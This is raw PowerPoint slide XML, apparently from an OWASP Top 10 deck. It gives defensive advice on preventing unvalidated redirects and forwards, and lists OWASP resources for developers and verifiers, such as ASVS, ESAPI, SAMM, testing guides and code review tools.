              <a:t>Simply avoid using redirects and forwards.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If used, don’t involve user parameters in calculating the destination. This can usually be done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If destination parameters can’t be avoided, ensure that the supplied value is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	It is recommended that any such destination parameters be a mapping value, rather than the actual URL or portion of the URL, and that server side code translate this mapping to the target URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Applications can use ESAPI to override the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>sendRedirect()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> method to make sure all redirect destinations are safe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Avoiding such flaws is extremely important as they are a favorite target of phishers trying to gain the user’s trust.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unvalidated Redirects and Forwards</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A10</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09155003"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="7997672"/>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Establish</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> &amp; Use Repeatable Security Processes and Standard Security Controls</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4">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>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Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this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To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>numerous </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>free and open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>resources that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>you can use to address application security in your organization. The following are some of the many resources OWASP has produced to help organizations produce secure web applications. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their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There are numerous additional OWASP resources available for your use. Please visit the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, which lists all of the OWASP projects, organized by the release quality of the projects in question (Release Quality, Beta, or Alpha). Most OWASP resources are available on our </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, and many OWASP documents can be ordered in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>hardcopy or as eBooks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</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0" name="Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What’s Next for Developers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>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+D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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t>To produce a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>secure</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> web application, you must define what secure means for that application. OWASP recommends you use the OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t>Application Security Verification Standard (ASVS)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, as a guide for setting the security requirements for your application(s). If you’re outsourcing, consider the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t>OWASP Secure Software Contract Annex</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="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dirty="0" smtClean="0"/>
                <a:t>Application Security Requirements</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="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latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Rather than retrofitting security into your applications, it is far more cost effective to design the security in from the start. OWASP recommends the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                  <a:hlinkClick r:id="rId9"/>
                </a:rPr>
                <a:t>OWASP Developer’s Guide</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>, and the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                  <a:hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t>OWASP Prevention Cheat Sheets</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> as good starting points for guidance on how to design security in from the beginning.</a:t>
              </a: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Application Security Architecture</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="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t>Building strong and usable security controls is exceptionally difficult. A set of standard security controls radically simplifies the development of secure applications. OWASP recommends the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>OWASP Enterprise Security API (ESAPI) project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> as a model for the security APIs needed to produce secure web applications. ESAPI provides reference implementations in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>Java</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>.NET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>PHP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>Classic ASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>Python</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>Cold Fusion</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>.</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Standard Security Controls</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="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smtClean="0"/>
                <a:t>To improve the process your organization follows when building such applications, OWASP recommends the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t>OWASP Software Assurance </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t>Maturity Model (SAMM)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>. This model helps organizations formulate and implement a strategy for software security that is tailored to the specific risks facing their organization.</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smtClean="0"/>
                <a:t>The </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId14"/>
                </a:rPr>
                <a:t>OWASP Education Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> provides training materials to help educate developers on web application security and has compiled a large list of </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t>OWASP Educational Presentations</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>. For hands-on learning about vulnerabilities, try </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>OWASP WebGoat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId17"/>
                </a:rPr>
                <a:t>WebGoat.NET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, or the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>OWASP Broken Web Applications Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>. To stay current, come to an </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t>OWASP AppSec Conference</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, OWASP Conference Training, or local </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId20"/>
                </a:rPr>
                <a:t>OWASP Chapter meetings</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="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Application Security Education</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>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51951325"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143001"/>
          <a:ext cx="6858000" cy="3520439"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="380999">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Get Organized</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046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 verify the security of a web application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> you have developed, or one you are considering purchasing, OWASP recommends that you review the application’s code (if available), and test the application as well. OWASP recommends a combination of secure code review and application penetration testing whenever possible, as that allows you to leverage the strengths of both techniques, and the two approaches complement each other. Tools for assisting the verification process can improve the efficiency and effectiveness of an expert analyst. OWASP’s assessment tools are focused on helping an expert become more effective, rather than trying to automate the analysis process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Standardizing How You Verify Web Application Security: To help organizations develop consistency and a defined level of rigor when assessing the security of web applications, OWASP has produced the OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. This document defines a minimum verification standard for performing web application security assessments. OWASP recommends that you use the ASVS as guidance for not only what to look for when verifying the security of a web application, but also which techniques are most appropriate to use, and to help you define and select a level of rigor when verifying the security of a web application. OWASP also recommends you use the ASVS to help define and select any web application assessment services you might procure from a third party provider.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Assessment Tools Suite: The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Live CD Project</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> has pulled together some of the best open source security tools into a single bootable environment or virtual machine (VM). Web developers, testers, and security professionals can boot from this Live CD, or run the VM, and immediately have access to a full security testing suite. No installation or configuration is required to use the tools provided on this CD.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 name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What’s Next for Verifiers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 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+V</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53538302"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4724401"/>
          <a:ext cx="3429000" cy="4465320"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="308923">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Code Review</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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4084319">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smtClean="0"/>
                        <a:t>Secure code review is particularly suited to verifying that an application contains strong security mechanisms as well as finding issues that are hard to identify by examining the application’s output. Testing is particularly suited to proving that flaws are actually exploitable. That said, the approaches are complementary and in fact overlap in some areas.</a:t>
                      </a:r>
                    </a:p>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smtClean="0"/>
                        <a:t>Reviewing the Code: As a companion to the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Developer’s Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, OWASP has produced the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP Code Review Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> to help developers and application security specialists understand how to efficiently and effectively review a web application for security by reviewing the code. There are numerous web application security issues, such as Injection Flaws, that are far easier to find through code review, than external testing.</a:t>
                      </a:r>
                    </a:p>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smtClean="0"/>
                        <a:t>Code Review Tools: OWASP has been doing some promising work in the area of assisting experts in performing code analysis, but these tools are still in their early stages. The authors of these tools use them every day when performing their secure code reviews, but non-experts may find these tools a bit difficult to use. These include </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CodeCrawler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Orizon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>O2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Only </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>O2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> has been under active development since the last release of the Top 10 in 2010.</a:t>
                      </a:r>
                    </a:p>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smtClean="0"/>
                        <a:t>There are other free, open source, code review tools. The most promising is </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>FindBugs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, and its new security focused plugin called: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>FindSecurityBugs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, both of which are for Java.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="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35341078"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3505200" y="4724400"/>
          <a:ext cx="3352800" cy="4419600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="344996">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Security and Penetration Testing</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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40746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Testing the Application: OWASP produced the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> to help developers, testers, and application security specialists understand how to efficiently and effectively test the security of web applications. This enormous guide, which had dozens of contributors, provides wide coverage on many web application security testing topics. Just as code review has its strengths, so does security testing. It’s very compelling when you can prove that an application is insecure by demonstrating the exploit. There are also many security issues, particularly all the security provided by the application infrastructure, that simply cannot be seen by a code review, since the application is not providing all of the security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Application Penetration Testing Tools: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>WebScarab</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, which was one of the most widely used of all OWASP projects,  and the new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>ZAP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
